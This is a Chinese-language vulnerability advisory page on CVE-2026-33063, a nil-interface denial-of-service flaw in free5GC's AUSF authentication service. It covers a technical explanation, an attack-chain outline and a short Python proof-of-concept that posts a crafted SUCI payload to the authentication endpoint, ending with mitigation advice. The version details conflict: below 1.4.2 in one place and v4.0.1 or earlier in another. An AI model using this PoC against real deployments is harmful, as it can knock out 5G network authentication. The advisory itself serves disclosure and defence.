IPBUF安全漏洞报告
English
CVE-2026-33063 CVSS 7.5 高危

CVE-2026-33063 free5GC AUSF空指针致拒绝服务漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33063
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
free5GC

相关标签

拒绝服务DoSfree5GC5G核心网空指针解引用

漏洞概述

free5GC是开源5G核心网项目,其AUSF组件在1.4.2之前的版本中存在空指针检查不当漏洞。该漏洞影响使用AUSF UE认证服务的所有部署。由于`GetSupiFromSuciSupiMap`函数未检查nil值,远程攻击者无需认证即可发送特制UE认证请求,触发接口转换错误导致服务崩溃,造成认证服务完全拒绝服务。

技术细节

该漏洞源于free5GC AUSF服务处理UE认证请求时的代码逻辑缺陷,具体位于`GetSupiFromSuciSupiMap`函数中。开发者在编写代码时,尝试将一个`interface{}`类型的泛型接口强制转换为`*context.SuciSupiMap`指针类型,但严重疏忽了对底层值是否为nil的安全检查。当远程攻击者向`/nausf-auth/v1/ue-authentications`端点发送精心构造的恶意UE认证请求时,会操纵上下文环境使得`SuciSupiMap`为nil。此时代码执行类型断言失败,Go语言的运行时机制会立即触发panic,输出“interface conversion: interface {} is nil, not *context.SuciSupiMap”错误信息,导致AUSF进程异常终止。由于该服务无需用户交互且无需认证即可通过网络访问,攻击者可轻易实施拒绝服务攻击。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别运行free5GC v4.0.1或更早版本AUSF组件的目标,确认开放/nausf-auth/v1/ue-authentications端口。
STEP 2
武器化
攻击者构造特制的UE认证请求数据包,该数据包旨在触发AUSF内部逻辑,使`GetSupiFromSuciSupiMap`函数处理nil值。
STEP 3
交付
攻击者通过网络向受害者的AUSF服务端点发送恶意的认证请求。
STEP 4
利用
AUSF服务处理请求时,执行到存在缺陷的`GetSupiFromSuciSupiMap`函数,尝试对nil接口进行类型转换。
STEP 5
影响
Go运行时检测到无效转换,触发panic异常,导致AUSF进程崩溃,造成5G核心网认证服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Conceptual PoC for CVE-2026-33063 # Target: free5GC AUSF < 1.4.2 # Endpoint: /nausf-auth/v1/ue-authentications # Description: Sending a crafted request that triggers nil interface conversion. target_url = "http://target-ip:8000/nausf-auth/v1/ue-authentications" # The specific JSON structure to trigger the nil map depends on internal logic. # Typically involves sending a malformed SUCI (Subscription Concealed Identifier) # or specific payload that causes the map lookup to fail and return nil. payload = { "suci": "suci-0-001-01-0000-0-0-00", "additional_data": {} } try: response = requests.post(target_url, json=payload) # If the exploit is successful, the server will panic and the connection may reset or return a 500 error print(f"Status Code: {response.status_code}") print("Response: {}".format(response.text)) except Exception as e: print(f"Request failed or server crashed: {e}")

影响范围

free5GC AUSF < 1.4.2

防御指南

临时缓解措施
在应用层无直接绕过方法,建议限制AUSF API仅对可信来源开放,或应用网络访问控制策略。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表